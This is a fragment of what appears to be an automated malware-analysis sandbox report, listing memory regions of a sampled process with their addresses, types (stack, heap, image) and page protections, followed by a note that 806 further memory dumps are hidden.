28F000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page read and write
|
||
24CF000
|
stack
|
page read and write
|
||
42D000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2FF7000
|
unkown
|
page read and write
|
||
3013000
|
unkown
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
9F0000
|
heap private
|
page read and write
|
||
30CD000
|
unkown
|
page read and write
|
||
2C90000
|
unkown
|
page write copy
|
||
320000
|
heap default
|
page read and write
|
||
2160000
|
unkown
|
page read and write
|
||
2080000
|
unkown
|
page readonly
|
||
270E000
|
stack
|
page read and write
|
||
3D1C000
|
unkown
|
page read and write
|
||
320000
|
unkown
|
page readonly
|
||
84C000
|
unkown
|
page read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
There are 806 hidden memdumps, click here to show them.